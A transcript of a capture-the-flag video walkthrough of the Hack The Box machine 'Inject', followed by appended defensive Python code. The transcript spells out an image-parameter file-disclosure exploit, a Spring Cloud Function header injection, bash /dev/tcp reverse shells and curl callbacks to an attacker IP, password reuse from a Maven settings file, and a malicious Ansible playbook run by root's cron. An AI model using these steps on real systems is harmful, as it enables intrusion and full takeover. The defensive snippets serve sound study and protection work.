Transcript for:
Hack The Box: Inject Walkthrough

What's going on, YouTube? This is IppSec. I'm doing Inject from Hack The Box, and I really like this box because the vulnerability is part of the framework that is hosting it. It is the Spring Cloud config server, but the web server doesn't make it super apparent it is using that. The first recon you do, you discover it is probably a Tomcat box, which means it's running a Java application, and the web server also has a file disclosure vulnerability in the image upload functionality, so you can leak the contents of any file on the disk. Now since you know it's Tomcat, Java has this weird quirk where if you just open a directory, the contents of that directory would be a directory listing, so you can use that file disclosure to leak the contents of directories, find the pom.xml file, which is like the requirements.txt in Python; it lists all the libraries the application is using, and from there you can discover it's running the Spring framework, specifically the Spring Cloud config server. Google and exploit, get a foothold on the box, and the root is abusing an Ansible playbook. So with that being said, let's just jump in. As always I'm going to start with an nmap, so -sC for default scripts, -sV enumerate versions, -oA output all formats, put it in the nmap directory and call it inject, and then the IP address of 10.10.11.204. This can take a while to run, so I've already run it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have this thing saying nagios-nsca on port 8080. The NSE scripts that ran off of it look like it's an HTTP page, so let's go and check it out. So I'm going to go to 10.10.11.204 port 8080, and it is going over to Burp Suite, so let's turn intercept off, and we just get a page. I'm actually going to turn intercept back on because I want to look at the server headers, just to see if there's something saying Nagios in this header, right? I don't see anything like I was
expecting, Server: nagios nsca or X-Powered-By. Since I don't see anything, I'm guessing this is just the default for nmap if it sees something on port 8080 it can identify; for some reason it's saying Nagios, but I'm not going to trust nmap just because I don't see it with my own eyes. So let's take a look at this web server. I'm going to test just index.php to see if it's a PHP web server, and we get this error message, which looks very much like a Tomcat error message to me. I'm just doing it based upon experience and eyes; if you've looked at Tomcat it probably stands out. I don't think there's anything that specifically says Tomcat here, but it definitely is, right? We can try /manager to see if there's anything there. We could try like the directory traversal trick with ..; I want to say it is. We just get a bad request, and that's not working because we don't have nginx or Apache in front of it, right? And generally we would know if Apache or nginx is in front of it because it sets the Server header on the HTTP response. So I'm just going to set up gobuster so we have it running in the background, so we'll do gobuster -u http://10.10.11.204:8080, wordlist SecLists Discovery/Web-Content/raft-small-words.txt, outfile, we'll just do gobuster.l. So with that running, we can take a look at what we can do on this page. If I click login, nothing happens. If I click sign up, we go to an under construction page. Looking at just the site, there is a free... if I click Start Now, can't do anything on any of these Start Nows, but there's not much we can do. There is this upload piece, so if I click on upload we have a file upload form. I'm just going to try uploading the readme.license and we get "only image files are accepted", so I'm gonna go find an image file, so we'll just do find / -name *.jpeg. I'm actually going to specify the user directory, and we'll take this greenbone-banner.jpg image. So let's go back here, paste this in, upload it,
and then we can view our image, and then this HTTP parameter, image=... this looks very much like a file inclusion thing to me, so we should test by putting a bunch of ../ and then /etc/passwd, and we see the image can't be displayed because it contains errors. I'm going to send this over to Burp Suite so we can easily actually see the contents, and we can see the passwd contents do come out. There's also two users I notice; I see Frank, or Phil and Frank, so two users here. Nothing else too interesting. Since this is Tomcat and it's a Java application, we can actually get directory listings from this LFI. So in Java, if you do an open call on a directory, it treats that directory as a file with the contents of it being the directory listing, and this is something that I think is somewhat unique to Java; it doesn't work in Python or a lot of other languages, but it is handy because we no longer have to guess at like file names, right? If I just do ../ we can see we're in this directory; this is probably the inside of the Java app, as we have uploads. If I go up one more we have main and test. If I go up one more, this would be the parent directory of the Java application, and this is the one I'm really after because this has pom.xml, which is going to be a listing of all the libraries this Java thing uses. So if I do pom.xml we could download this, so I'm just going to copy and paste it, so we'll do copy, paste, and let's go vi pom.xml, paste it in, and we can explore this a little bit more. So we'll revisit pom.xml in a second; I just want to see if I also can get like the Java source. So if we do src/main, this is where we were, so if we go java, then let's see, com/example/webapp, and then WebApplication... WebAppApplication.java. Did I misspell that? Let's copy this, paste, we can start getting the source code of this application as well. That's just SpringApplication. I'm sure if we went into the user directory we have User.java as well, so if you
wanted to see exactly how this worked, we could, but the key thing is going to be the pom.xml file because that's going to be all the dependencies it actually uses. Right here we're looking at how it handles the file upload, but the pom.xml, let's take a look at it. We can see just all the dependencies and the versions, so we can see the Spring framework, and around the time this box released, I want to say there were a lot of Spring vulnerabilities, right? But I'm not going to memorize all of those; the way I would handle this is opening this up in Visual Studio Code and using Snyk to identify any vulnerabilities. So if I go over to Snyk, the open source code security scanner is going to find this pom.xml file and tell if there's any library problems. It doesn't look like it ran; let's see, it's scanning, click to see problems. If I go over to this one, away from the language server, the Code, Open Source dependencies, I see the code scan is trying to run Maven and we do not have Maven, so I'm just going to add Maven to the box. There's sudo apt install maven, put it in, and it shouldn't take too long, and once we have the mvn command, hopefully Snyk's code security thing will find it, right? So now we have it. I probably should not have run that; it just downloaded a bunch of things, I think. Let's just run this again. So I don't see any error messages, it says success, so I'm thinking we are good. So hopefully this finishes in the next like 5 or 10 seconds, I would say. I'm gonna pause the video, but as soon as I say that it's going to finish, but I guess I will pause the video and resume once this scan finishes. And here we go, we have pom.xml with a critical vulnerability. If we click on it we can look at what Snyk is telling us, and let's see, we got CVE-2022-22693. I'm just going to click on this, and then I'm going to go over, turn off Burp Suite, I'm just going to search GitHub POC, and this one looks good. If we click on this, it looks like there is a Python script, and let's see, I think I used
one that wasn't a Python script. Let's go back, maybe this top one, because I actually just used a terminal prompt to exploit this. Let's see, maybe this one; we can use the Python script if I don't find it, or just make use of it. It looks like all these are pretty much the same thing, so I'm not going to run the script just because I think it's going to be less interesting. If we look at what it's doing, it's setting the header spring.cloud.function.routing-expression and then the payload, and that's essentially all we have to do, and it's going to be a POST request, and the URL is going to be /functionRouter. So the first thing to do is make sure functionRouter exists, so if we go over here, we do a GET on functionRouter, we get a 500 error; if we put a d on the end of it it's a 404, so we know this exists, and we want to make this a POST request, and then all this is doing is setting spring.cloud.function.routing-expression and then the payload. So if we go with this, and then what does the payload look like? So it's this, and it's going to be anything, so I'm going to do /usr/bin/curl 10.10.14.8 port 8000.
So this is just going to be one to test if it works. I think we need two line breaks at the end, and let's do nc -lvnp 8000, run it, and we get a request, so we know this works. Let's make a directory www. Let's see, actually we can try just a reverse shell first, so let's do bash -i >& /dev/tcp/10.10.14.8/9001 0>&1, so nc -lvnp 9001, send it, we don't get a shell. We can try doing bash -c and we still don't get a shell, so my next step would be copying this payload, and then we can put it in www as index.html, paste that, python3 -m http.server, listener 9001, and we already know /usr/bin/curl 10.10.14.8:8000 works, so I can pipe this over now to bash, and once I add the pipe it no longer works. We have two requests; if I do | bash we don't get one; if I do /bin/bash -c, let's try it this way, we don't get anything either. I get rid of the /bin/bash, still nothing, so maybe the single quotes are a bad character. If I get rid of single quotes, still nothing. Maybe the pipe is also a bad character, so we can do --output /tmp/shell and see if it saves it. We need to get rid of bash -c; so we have a request come in, so I should be able to just exec /tmp/shell. So if I do bash /tmp/shell we get a shell on the box. Now we could do this without dropping anything to a file, and the trick will be avoiding the bad characters, so let me try this real quick. I'm gonna cat index.html so I can grab this payload; I'm going to convert it to base64.
So if I echo, base64, and I'm just going to get rid of the special URL-type characters, so if I do a space here, now that's all alphanumeric; if I do a space here, that's good, and then we want to get rid of the padding on the end, so this all looks good. So we now have just an alphanumeric string, which has fewer bad characters, right? So if I echo, I should just be able to echo this and then base64 -d and pipe over to bash. I was thinking, I normally do echo -n, that's why I paused for a second, but if I do this and nc -lvnp 9001, that gets a shell, so we have verified that our payload works. So let us do, I think it's bash -c, and we can't use any quotes after this, so I'm going to take advantage of brace expansion in bash, and if I do it this way, put everything in squiggly brackets and then commas where the spaces are, I think it's going to work. So we are not listening; let's do nc -lvnp 9001, send it, did not work. Let's see, /bin/bash, let's see, I wonder if I need a -i. I did this before; if I get exactly how I did this to evade all the bad characters, let's just try running our payload, so if I copy this, put this in the pane, command not found; oh, we have a space, that looks better, but it did not run our payload; without the bash it did, so I wonder if it's because I forgot that -n earlier. Let's just remove this one space because this definitely caused an issue, so we're listening, nope, that was it, it was just the space. The -n thing I'm talking about, when I made the base64 string I just did echo, so let's see, where is it, where's up here, right, echo, was it down here? I'm not exactly sure where I made it, but whatever pane it was that I made it in, I was just doing echo, then bash -i, I didn't do a -n, and normally I do, but it doesn't look like that -n is actually needed. So let's get a shell; let's do python3 -c 'import pty; pty.spawn("/bin/bash")', stty, we need to background it with Ctrl-Z, stty raw -echo; fg, enter, enter, and let's export TERM=x
term, so I can clear the screen, and we can take a look at this box. We are the frank user, so if I go in my home directory we don't really have too much there. We have this .m2 directory, which I don't recognize. I'm just going to do a find . -type f and we have settings.xml, so if I look at this we have Phil and his password. So what is this file for? I'm guessing it's some Maven-type thing or something; I don't know exactly what the .m2 directory is. What is the .m2 directory? Default folder for Maven to store its settings, which has like repository information, so I'm guessing it's like someone has their git credentials in the .git folder, if something is how I equate this, right? So we have phil and then this password, and Phil was a user, so if I grep for everything that ends with sh in /etc/passwd, we do have root, frank and phil, so I'm going to try the password for phil. So if I su - phil, try to log in, we can. We can also test if this works with SSH, so if we did ssh phil@10.10.11.204, right, this is 10.10.11.204, put this in, and we can't log in, so Phil cannot log in via SSH, which is good, because if he could, we could also access this file most likely from the LFI, right? So if we did a bunch of ../, probably one more, and then go home/phil/.m2, no, it's frank; it looks like Phil gave Frank just his Maven configuration, right? So now we can access the phil user and we have user.txt here. If we do find . -type f, we need this, we don't really have anything. If I do, let's do sudo -l, put in the password, wrong clipboard, Phil may not run it. We can find / -user phil, output 2>/dev/null, and see what files Phil owns, and we probably want to hide proc and run, so let's do a grep -v anything that begins with proc, then, or anything that begins with sys, or anything that begins with run, and we see Phil just has things in home and that's it. So if I look at my groups, Phil is also a member of staff, so if we do find / -group
staff, we can see there is this /opt/automation/tasks and a bunch of Ansible stuff. Let's do a -writable to see if we can write to these things. There we go; my terminal size was set weirdly. We can write to /opt/automation/tasks, so let's look at exactly what this is. If we cat playbook one, it's just a simple thing to make sure the webapp service is enabled in systemd. So let's see, we do ls -la, we can't write to this playbook, so we should figure out exactly what is executing this, right? And pspy is a really good thing to look at at this point. If I look at /opt, I don't think I have pspy on this box, so let's go and download it: GitHub, pspy, and I will have to add these to my Ansible playbook to install Parrot. If you don't know about that, if you do IppSec, or github.com/IppSec/parrot-build, this is the repository for building the exact VM you see me use here, right? So I'm going to add things so you don't have to go and add all these packages manually. If you have questions about this playbook, if you go youtube.com/ippsec, then we have a playlist here of building Parrot where I go over all that Ansible stuff, which, if anything I'm saying about Ansible doesn't make sense here, that playbook, or the building Parrot series, is a good video series to watch. So let's look at the releases here; we'll do pspy64s, save it to Downloads. We can move Downloads/pspy64s here, and let's set up our web server, and let's go /dev/shm, wget 10.10.14.8:8000/pspy64s, chmod +x on the file, and we can run pspy. We probably don't want the small, then; let's just download the regular pspy64. The small, they stripped some of the symbols and it's not compatible with all versions of glibc, is my guess at what would happen there. So let's move Downloads/pspy64 here, start the web server back up, wget it, that was chmod, wget it, chmod +x pspy64.
Execute it, and now we should just wait for a minute or two and see if anything comes up that is being run on the system. And there is a lot of things that just happened, so let's look at exactly what kicked off this Ansible. So going up we have a cron, ansible-parallel, and it's running everything in /opt/automation/tasks that ends in .yaml, so this we can just create our own playbook, right? So what I'm going to do: go back to /opt/automation/tasks, and we had write access to this directory, so I'm going to vi shell.yaml, and then we just have to specify the stuff, and I'm just going to actually copy playbook one to shell.yaml so we have a lot of the boilerplate stuff done, and instead of the systemd I'm going to use the shell, and then we can do a cmd of bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1', like that, and then delete these two lines, save it. Let's set up our web... or a listener. I'm gonna do a date real quick to see the time; we have 30 seconds, so we can clear this up and just say sending a shell, and I think this is all we need. So if I look at date, we have about 15 seconds left. I guess we can do /dev/shm, execute pspy again, just so we can see Ansible run in case we don't get a shell, and maybe we can do some type of troubleshooting, but more importantly we can just see exactly when this cron fires, if it's every minute or every two minutes. We see it running now, and we got the shell. So again, if you're confused at exactly what happened, a better thing to do is just do a crontab -l to list the crons, and let's see, this is the cron job we exploited, so it's running ansible-parallel, which just runs multiple playbooks at once, and it's running all playbooks in /opt/automation/tasks. So if we go now, root, we could get the flag. So hopefully you guys enjoyed the video. Take care, and I will see you all next time.
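The file disclosure exploited above through the image parameter comes down to a user-supplied name being joined to the upload directory without a check. As an added example (not code from the video or from the box's application, and written in Python rather than the app's Java), this is the check a defender would want on that endpoint: canonicalize the path, confirm it stays inside the upload directory, and refuse anything that is not a regular file, which also closes the directory-listing quirk the video relies on. The directory layout and file names below are constructed.

```python
import os
import tempfile
from typing import Optional
from urllib.parse import unquote


def resolve_upload(base_dir: str, requested: str) -> Optional[str]:
    """Map the user-supplied ?image= value onto a file under base_dir.

    Returns the real path of a regular file inside base_dir, or None when the
    request would escape the directory (../ traversal, absolute path, symlink)
    or would open a directory (which Java turns into a directory listing).
    """
    # Decode once so %2e%2e%2f style encodings are judged by their real meaning.
    name = unquote(requested)
    # Never let an absolute path or a NUL byte reach the filesystem API.
    if os.path.isabs(name) or "\x00" in name:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # realpath collapses ../ and follows symlinks, so a prefix check on the
    # result is meaningful; the separator stops /uploads2 matching /uploads.
    if candidate != base and not candidate.startswith(base + os.sep):
        return None
    # Reject directories and anything else that is not a plain file.
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo() -> dict:
    """Constructed layout: uploads/banner.jpg, a subdirectory, and a symlink
    inside uploads/ that points at a file outside it. Returns which probes
    the check lets through."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "uploads")
    os.makedirs(os.path.join(uploads, "sub"))
    with open(os.path.join(uploads, "banner.jpg"), "wb") as f:
        f.write(b"\xff\xd8\xff")  # constructed JPEG magic bytes, not a real image
    secret = os.path.join(root, "secret.txt")
    with open(secret, "w") as f:
        f.write("outside the upload directory\n")
    os.symlink(secret, os.path.join(uploads, "link.jpg"))
    probes = [
        "banner.jpg",                        # legitimate upload
        "../secret.txt",                     # plain traversal
        "%2e%2e%2fsecret.txt",               # URL-encoded traversal
        "..%2F..%2F..%2F..%2Fetc%2Fpasswd",  # encoded deep traversal
        "link.jpg",                          # symlink escaping the directory
        "sub",                               # directory: would list contents
        ".",                                 # the upload directory itself
        "/etc/passwd",                       # absolute path
    ]
    return {p: resolve_upload(uploads, p) is not None for p in probes}
```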
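The two request patterns used in the walkthrough, traversal through the image parameter (including encoded forms and the bare ../ that yields a directory listing) and POST requests to /functionRouter carrying the spring.cloud.function.routing-expression header, are easy to flag in proxy or WAF request logs. The detection logic below is an added example, not part of the video; it runs over constructed request records in which the /view path and the header value are placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Matches a "../" or "..\" path segment, also at the very start or end of a value.
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
# Files the walkthrough pulls through the image parameter; extend per environment.
SENSITIVE = ("/etc/passwd", "pom.xml", "/.m2/settings.xml", "/proc/")
# Header abused in the walkthrough to hand a SpEL expression to Spring Cloud Function.
ROUTING_HEADER = "spring.cloud.function.routing-expression"


def classify(method: str, url: str, headers: dict) -> list:
    """Return human-readable findings for one request; an empty list means clean."""
    findings = []
    parts = urlsplit(url)
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decoded once; decode again so a double-encoded value
        # (%252e%252e%252f) is judged on what the application finally sees.
        decoded = unquote(value)
        if TRAVERSAL.search(decoded):
            findings.append(f"traversal in {key}")
        if any(s in decoded for s in SENSITIVE):
            findings.append(f"sensitive path in {key}")
    path = parts.path.rstrip("/").lower()
    if method.upper() == "POST" and path.endswith("/functionrouter"):
        findings.append("POST to Spring Cloud Function router")
    if ROUTING_HEADER in {h.lower() for h in headers}:
        findings.append("SpEL routing-expression header present")
    return findings


# Constructed sample records (method, URL, headers); the /view path and the
# header value are placeholders, not the box's real endpoint or payload.
SAMPLE_REQUESTS = [
    ("GET", "/view?image=greenbone-banner.jpg", {"User-Agent": "Mozilla/5.0"}),
    ("GET", "/view?image=../../../../etc/passwd", {}),
    ("GET", "/view?image=..%252F..%252Fpom.xml", {}),
    ("GET", "/view?image=../", {}),
    ("POST", "/functionRouter", {ROUTING_HEADER: "REDACTED-EXPRESSION"}),
    ("GET", "/upload", {}),
]


def scan(records) -> dict:
    """Map record index -> findings, so a rule can alert on any non-empty entry."""
    return {i: classify(m, u, h) for i, (m, u, h) in enumerate(records)}
```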
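The root step works because root's cron runs every playbook in a directory the staff group can write to, so the protection on the individual playbook file does not matter. This added audit (not from the video) walks such a directory and reports every path a non-root principal could change, the directory itself included; it is demonstrated on a constructed layout, and the playbook name is a placeholder.

```python
import os
import stat
import tempfile


def audit_playbook_dir(tasks_dir: str) -> dict:
    """Return {path: [reasons]} for the directory and everything under it that
    someone other than root could modify or replace. Whatever root executes
    from here (the ansible-parallel cron in the walkthrough) inherits the
    trust of the least-protected path in this list."""
    findings = {}
    paths = [tasks_dir]
    for dirpath, dirnames, filenames in os.walk(tasks_dir):
        paths.extend(os.path.join(dirpath, n) for n in dirnames + filenames)
    for p in paths:
        st = os.lstat(p)  # lstat: judge the link itself, not its target
        reasons = []
        if st.st_uid != 0:
            reasons.append(f"owned by uid {st.st_uid}, not root")
        if st.st_mode & stat.S_IWGRP:
            reasons.append(f"group-writable (gid {st.st_gid})")
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if stat.S_ISLNK(st.st_mode):
            reasons.append("symlink: target could be swapped")
        if reasons:
            findings[p] = reasons
    return findings


def demo() -> dict:
    """Constructed layout mimicking the box: a tasks directory that is
    group-writable, holding one playbook that is itself read-only for the
    group. Keys are paths relative to the temp root."""
    root = tempfile.mkdtemp()
    tasks = os.path.join(root, "tasks")
    os.mkdir(tasks)
    playbook = os.path.join(tasks, "playbook_1.yml")  # placeholder name
    with open(playbook, "w") as f:
        f.write("- hosts: localhost\n  tasks:\n  - debug:\n      msg: constructed\n")
    os.chmod(playbook, 0o644)  # the file cannot be edited by the group...
    os.chmod(tasks, 0o775)     # ...but new playbooks can be dropped beside it
    return {os.path.relpath(p, root): r for p, r in audit_playbook_dir(tasks).items()}
```

On a real host, run the audit as root against the directory named in the cron entry; a clean result is an empty dict.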